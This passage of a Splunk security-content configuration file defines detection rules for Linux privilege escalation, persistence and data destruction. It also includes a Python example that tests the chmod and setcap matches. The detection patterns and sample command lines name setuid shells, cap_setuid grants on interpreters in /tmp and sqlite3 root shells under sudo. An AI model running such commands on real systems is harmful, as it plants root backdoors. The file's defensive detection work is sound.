action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or network operators can execute this command. Please update the filter macros to remove false positives.
action.escu.creation_date = 2021-12-21
action.escu.modification_date = 2021-12-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Setuid Using Chmod Utility - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = A commandline $process$ that may set suid or sgid on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Setuid Using Chmod Utility - Rule
action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.001", "T1548"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes WHERE (Processes.process_name = chmod OR Processes.process = "*chmod *") AND Processes.process IN("* g+s *", "* u+s *", "* 4777 *", "* 4577 *") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_setuid_using_chmod_utility_filter`

[ESCU - Linux Setuid Using Setcap Utility - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for suspicious setcap utility execution that grants a binary file capabilities such as cap_setuid. Unlike chmod, setcap does not set the SUID bit; it attaches Linux capabilities to the executable, and a binary holding cap_setuid in its effective or permitted set can change its user ID to root, which gives an attacker the same outcome as a SUID-root binary. For comparison, a SUID binary runs with the privileges of its owner rather than those of the invoking user; when the owner is root, this lets an unprivileged user temporarily gain root privileges, usually in order to run one specific program. Only the root account, for example, is allowed to change the password information contained in the password database, so the passwd utility is installed SUID root. In a long listing, an s in the owner's execute position means the SUID bit is set and the owner also has execute permission; a capital S means the SUID bit is set but the owner does not have execute permission. The second special permission is the SGID, or set group id, bit. It is similar to the SUID bit, except that it temporarily changes the effective group of the running program. The SGID bit is set if an s or an S appears in the group section of the permissions.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.001", "T1548"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for suspicious setcap utility execution that grants a binary file capabilities such as cap_setuid. Unlike chmod, setcap does not set the SUID bit; it attaches Linux capabilities to the executable, and a binary holding cap_setuid in its effective or permitted set can change its user ID to root, which gives an attacker the same outcome as a SUID-root binary. For comparison, a SUID binary runs with the privileges of its owner rather than those of the invoking user; when the owner is root, this lets an unprivileged user temporarily gain root privileges, usually in order to run one specific program. Only the root account, for example, is allowed to change the password information contained in the password database, so the passwd utility is installed SUID root. In a long listing, an s in the owner's execute position means the SUID bit is set and the owner also has execute permission; a capital S means the SUID bit is set but the owner does not have execute permission. The second special permission is the SGID, or set group id, bit. It is similar to the SUID bit, except that it temporarily changes the effective group of the running program. The SGID bit is set if an s or an S appears in the group section of the permissions.
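The Linux Setuid Using Chmod Utility search above and the Linux Setuid Using Setcap Utility search that follows match a fixed list of command-line spellings, so `chmod 4755 /tmp/x` or `setcap cap_setuid,cap_setgid=eip /tmp/x` would not alert. The Python below is an added example, not Splunk Threat Research Team code: it reimplements the two where-clauses literally and sets beside them a small parser that decodes the chmod mode argument and the setcap capability clauses, so the gap is testable against your own telemetry. The wildcard tuples are copied from the ESCU searches; the SENSITIVE_CAPS set, the parser and the sample command lines are assumptions made for this example.

```python
"""Added example (not Splunk Threat Research Team code): the chmod and setcap
where-clauses from the two Linux Setuid analytics, beside a parser that decodes
what the command line actually grants.

Wildcard tuples are copied from the ESCU searches; SENSITIVE_CAPS, the parser and
the sample command lines are assumptions made for this example.
"""
import re
import shlex
from fnmatch import fnmatchcase

CHMOD_PATTERNS = ("* g+s *", "* u+s *", "* 4777 *", "* 4577 *")
SETCAP_PATTERNS = ("* cap_setuid=ep *", "* cap_setuid+ep *", "* cap_net_bind_service+p *",
                   "* cap_net_raw+ep *", "* cap_dac_read_search+ep *")
# Assumed for the example: capabilities that let a binary escalate or bypass DAC checks.
SENSITIVE_CAPS = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
                  "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module", "cap_chown"}


def escu_chmod_match(process_name, process):
    """Literal reimplementation of the Linux Setuid Using Chmod Utility where-clause."""
    tool = process_name == "chmod" or fnmatchcase(process, "*chmod *")
    return tool and any(fnmatchcase(process, p) for p in CHMOD_PATTERNS)


def escu_setcap_match(process_name, process):
    """Literal reimplementation of the Linux Setuid Using Setcap Utility where-clause."""
    tool = process_name == "setcap" or fnmatchcase(process, "*setcap *")
    return tool and any(fnmatchcase(process, p) for p in SETCAP_PATTERNS)


def chmod_special_bits(process):
    """Special bits ({'suid', 'sgid'}) a chmod command line sets, from octal or symbolic modes."""
    argv = shlex.split(process)
    modes = [a for a in argv[1:] if not a.startswith("-")]  # skip -R, --reference=...
    if not modes:
        return set()
    mode, bits = modes[0], set()
    if re.fullmatch(r"0?[0-7]{3,4}", mode):  # octal: 4755, 06755, 2755 ...
        value = int(mode, 8)
        if value & 0o4000:
            bits.add("suid")
        if value & 0o2000:
            bits.add("sgid")
        return bits
    for clause in mode.split(","):  # symbolic: u+s, ug+s, a+s, u=rwxs ...
        m = re.fullmatch(r"([ugoa]*)([+=-])([rwxXst]*)", clause)
        if not m or m.group(2) == "-" or "s" not in m.group(3):
            continue
        who = m.group(1) or "a"  # no 'who' means all; umask does not mask the s bits
        if "u" in who or "a" in who:
            bits.add("suid")
        if "g" in who or "a" in who:
            bits.add("sgid")
    return bits


def setcap_sensitive_caps(process):
    """Sensitive capabilities a setcap command line puts in the effective or permitted set.

    Understands cap_from_text clauses: comma-separated caps (or 'all'), a [+=] action,
    then set letters, e.g. 'cap_setuid,cap_setgid=eip' or 'cap_net_raw+ep'.
    """
    granted = set()
    for arg in shlex.split(process)[1:]:
        m = re.fullmatch(r"((?:cap_[a-z_]+,?)+|all)([+=]+)([eip]+)", arg)
        if not m or not set(m.group(3)) & {"e", "p"}:
            continue  # flags such as -r/-v, the target path, or inheritable-only grants
        caps = SENSITIVE_CAPS if m.group(1) == "all" else set(m.group(1).split(",")) - {""}
        granted |= caps & SENSITIVE_CAPS
    return granted


def evaluate(process_name, process):
    """Side-by-side view: would the ESCU search fire, and what does the parser say was granted."""
    if process_name == "chmod":
        return {"escu": escu_chmod_match(process_name, process), "parsed": chmod_special_bits(process)}
    return {"escu": escu_setcap_match(process_name, process), "parsed": setcap_sensitive_caps(process)}


# Constructed command lines for the example, not real telemetry.
SAMPLE_COMMANDS = [
    ("chmod", "chmod u+s /tmp/.x/bash"),                          # ESCU fires, parser: suid
    ("chmod", "chmod 4755 /tmp/.x/bash"),                         # ESCU silent, parser: suid
    ("chmod", "chmod 0755 /usr/local/bin/tool"),                  # neither
    ("setcap", "setcap cap_setuid+ep /tmp/.x/python3"),           # ESCU fires, parser: cap_setuid
    ("setcap", "setcap cap_setuid,cap_setgid=eip /tmp/.x/perl"),  # ESCU silent, parser: both
]

if __name__ == "__main__":
    for name, cmd in SAMPLE_COMMANDS:
        print(f"{cmd!r:55} -> {evaluate(name, cmd)}")
```

The parser is deliberately narrow: it reads the first non-option argument of chmod as the mode and only credits capabilities placed in the effective or permitted set, because a capability left only in the inheritable set does not by itself let the binary escalate. Running it shows the second and fifth sample commands as cases the literal wildcard lists miss, which is the list of spellings to consider adding to the `*_filter` macro's companion search.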
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or network operators can execute this command. Please update the filter macros to remove false positives.
action.escu.creation_date = 2021-12-21
action.escu.modification_date = 2021-12-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Setuid Using Setcap Utility - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"]
action.risk = 1
action.risk.param._risk_message = A commandline $process$ that may grant privileged file capabilities on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Setuid Using Setcap Utility - Rule
action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.001", "T1548"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = setcap OR Processes.process = "*setcap *") AND Processes.process IN ("* cap_setuid=ep *", "* cap_setuid+ep *", "* cap_net_bind_service+p *", "* cap_net_raw+ep *", "* cap_dac_read_search+ep *") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_setuid_using_setcap_utility_filter`

[ESCU - Linux Shred Overwrite Command - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects a shred process overwriting files on a Linux machine. The shred utility is designed to overwrite a file to hide its contents or make the deleted file unrecoverable. We have seen this technique in the Industroyer2 malware, which tries to wipe systems at energy facilities in the targeted sector as part of its destructive attack. A normal user may use this command for valid purposes, but it is recommended to check which files, disks or folders it tries to shred, as that can be a good pivot for incident response in this type of destructive malware.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic detects a shred process overwriting files on a Linux machine. The shred utility is designed to overwrite a file to hide its contents or make the deleted file unrecoverable. We have seen this technique in the Industroyer2 malware, which tries to wipe systems at energy facilities in the targeted sector as part of its destructive attack. A normal user may use this command for valid purposes, but it is recommended to check which files, disks or folders it tries to shred, as that can be a good pivot for incident response in this type of destructive malware.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or network operators can use this application for automation purposes. Please update the filter macros to remove false positives.
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Shred Overwrite Command - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Industroyer2", "AwfulShred", "Linux Privilege Escalation", "Data Destruction", "Linux Persistence Techniques"]
action.risk = 1
action.risk.param._risk_message = A possible shred overwrite command $process$ executed on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Shred Overwrite Command - Rule
action.correlationsearch.annotations = {"analytic_story": ["Industroyer2", "AwfulShred", "Linux Privilege Escalation", "Data Destruction", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic detects a shred process overwriting files on a Linux machine. The shred utility is designed to overwrite a file to hide its contents or make the deleted file unrecoverable. We have seen this technique in the Industroyer2 malware, which tries to wipe systems at energy facilities in the targeted sector as part of its destructive attack. A normal user may use this command for valid purposes, but it is recommended to check which files, disks or folders it tries to shred, as that can be a good pivot for incident response in this type of destructive malware.
action.notable.param.rule_title = Linux Shred Overwrite Command
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name =shred AND Processes.process IN ("*-n*", "*-u*", "*-z*", "*-s*") by Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_shred_overwrite_command_filter`

[ESCU - Linux Sqlite3 Privilege Escalation - Rule]
action.escu = 0
action.escu.enabled = 1
description = sqlite3 is a terminal-based front-end to the SQLite library that can evaluate queries interactively and display the results in multiple formats. sqlite3 can also be used within shell scripts and other applications to provide batch processing features. If sudo rights are granted to this application for a user, that user can run system commands as root and possibly obtain a root shell.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = sqlite3 is a terminal-based front-end to the SQLite library that can evaluate queries interactively and display the results in multiple formats. sqlite3 can also be used within shell scripts and other applications to provide batch processing features. If sudo rights are granted to this application for a user, that user can run system commands as root and possibly obtain a root shell.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives may be present, filter as needed.
action.escu.creation_date = 2022-08-11
action.escu.modification_date = 2022-08-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Sqlite3 Privilege Escalation - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 30}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Sqlite3 Privilege Escalation - Rule
action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*sqlite3*" AND Processes.process="*.shell*" AND Processes.process="*sudo*" by Processes.dest Processes.user
Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_sqlite3_privilege_escalation_filter` [ESCU - Linux SSH Authorized Keys Modification - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies, based on process execution, modification of SSH authorized_keys files: bash or cat command lines that reference a path containing /authorized_keys. Adversaries perform this behavior to persist on endpoints. During triage, review parallel processes and capture any additional file modifications for review. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.004"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies, based on process execution, modification of SSH authorized_keys files: bash or cat command lines that reference a path containing /authorized_keys. Adversaries perform this behavior to persist on endpoints. During triage, review parallel processes and capture any additional file modifications for review. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Filtering will be required, as system administrators legitimately add and remove keys. 
One way to tune the search is to also match "echo" in the command line (for example, Processes.process="*echo*"), since appending a key to the file is commonly done with echo. action.escu.creation_date = 2022-07-27 action.escu.modification_date = 2022-07-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux SSH Authorized Keys Modification - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ modifying SSH Authorized Keys. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 15}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 15}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux SSH Authorized Keys Modification - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where 
Processes.process_name IN ("bash","cat") Processes.process IN ("*/authorized_keys*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_ssh_authorized_keys_modification_filter` [ESCU - Linux SSH Remote Services Script Execute - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies SSH being utilized to move laterally and execute a script or file on the remote host. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021.004"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies SSH being utilized to move laterally and execute a script or file on the remote host. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = This is not a common command to be executed. Filter as needed. 
action.escu.creation_date = 2023-03-03 action.escu.modification_date = 2023-03-03 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux SSH Remote Services Script Execute - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $process_name$ was identified on endpoint $dest$ by user $user$ attempting to move laterally and download a file. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux SSH Remote Services Script Execute - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies SSH being utilized to move laterally and execute a script or file on the remote host. 
action.notable.param.rule_title = Linux SSH Remote Services Script Execute action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=ssh Processes.process IN ("*oStrictHostKeyChecking*", "*oConnectTimeout*", "*oBatchMode*") AND Processes.process IN ("*http:*","*https:*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_ssh_remote_services_script_execute_filter` [ESCU - Linux Stdout Redirection To Dev Null File - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic looks for suspicious command lines that redirect stdout and stderr to /dev/null with the "&>/dev/null" shorthand (bash and zsh). This technique was seen in Cyclops Blink malware, which redirected any output or error while modifying the iptables firewall settings of the compromised machine to hide its actions from the user. This anomaly detection is a good pivot for looking further into why a process or user used this uncommon approach. Note that the search matches only the "&>" form; the equivalent ">/dev/null 2>&1" form is not covered. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.004", "T1562"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for suspicious command lines that redirect stdout and stderr to /dev/null with the "&>/dev/null" shorthand (bash and zsh). This technique was seen in Cyclops Blink malware, which redirected any output or error while modifying the iptables firewall settings of the compromised machine to hide its actions from the user. This anomaly detection is a good pivot for looking further into why a process or user used this uncommon approach. Note that the search matches only the "&>" form; the equivalent ">/dev/null 2>&1" form is not covered. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. 
action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Stdout Redirection To Dev Null File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Cyclops Blink", "Data Destruction", "Industroyer2"] action.risk = 1 action.risk.param._risk_message = A command line $process$ that redirects output to /dev/null was executed on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Linux Stdout Redirection To Dev Null File - Rule action.correlationsearch.annotations = {"analytic_story": ["Cyclops Blink", "Data Destruction", "Industroyer2"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.004", "T1562"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "*&>/dev/null*" by Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid Processes.dest Processes.user Processes.parent_process_name | `drop_dm_object_name(Processes)` | 
`security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_stdout_redirection_to_dev_null_file_filter` [ESCU - Linux Stop Services - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects events that attempt to stop or clear a service. This is typically identified in parallel with other instances of service enumeration, or attempts to stop a service and then delete it. Adversaries such as the Industroyer2 malware use this technique to terminate security services or other related services so that their destructive payload can continue toward its objective. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1489"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects events that attempt to stop or clear a service. This is typically identified in parallel with other instances of service enumeration, or attempts to stop a service and then delete it. Adversaries such as the Industroyer2 malware use this technique to terminate security services or other related services so that their destructive payload can continue toward its objective. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. 
